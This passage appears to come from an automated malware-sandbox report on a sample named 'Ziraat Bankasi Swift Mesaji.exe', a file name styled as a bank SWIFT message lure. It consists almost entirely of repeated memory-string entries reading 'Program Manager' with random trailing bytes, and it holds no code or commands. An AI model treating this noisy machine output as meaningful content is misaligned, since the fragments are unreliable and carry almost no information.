                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT,
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qtI
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT)
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT*
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\ +
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qx
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4/
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qtm
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q H&
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qtn
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTL
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerT
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qti
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q47
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q45
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTU
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q43
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q44
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTQ
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qtr
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTR
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q42
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qt-&
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4q(
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4^
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT{
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4[
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4Y
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4Z
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4g
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(Y%
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qL?+
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qx%
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTp
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTm
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTw
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTu
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4U
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|>%
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTv
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qh;
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qp9
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,s
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qpl-
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP!
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,}
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qpB
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP"
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qp=
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qp>
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,g
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,h
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$5,
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,e
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q -*
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qp%
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,a
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,b
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qp&
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,o
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,p
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qp4
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,m
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,n
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qpc
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qpb
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qp`
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP@
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP=
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qpK
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qpJ
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP(
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP%
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qpE
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP3
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX>
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP/
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP-
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qpN
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP.
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0<
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPW
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q07
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qLc'
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q08
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q06
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0D
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qQ&
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPF
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qpf
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPS
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q01
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qpo
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qpn
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP{
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0Z
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPw
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPx
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0c
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0_
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0`
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`*!
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0^
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qt
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX}+
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPr
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qtS#
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPo
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT3(
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(s
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(t
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]ql6
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(o
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]ql?
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPa$
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT(
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]ql>
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(x
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]ql9
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]ql(
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(a
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]ql&
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]ql!
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qH~
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(j
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(g
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qL
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qK)
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\]q
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qL3
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qL4
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qL2
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$l
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlG
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qL'
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qL#
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(t,
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qL!
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlB
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(2+
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlO
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qL/
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlP
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qL0
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qL-
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qdI(
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlJ
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qL*
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qLX
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,8
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlu
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlv
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,6
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qLS
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,3
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlt
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,=
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qL^
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,;
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,<
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qly
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qLY
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qd%
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlb
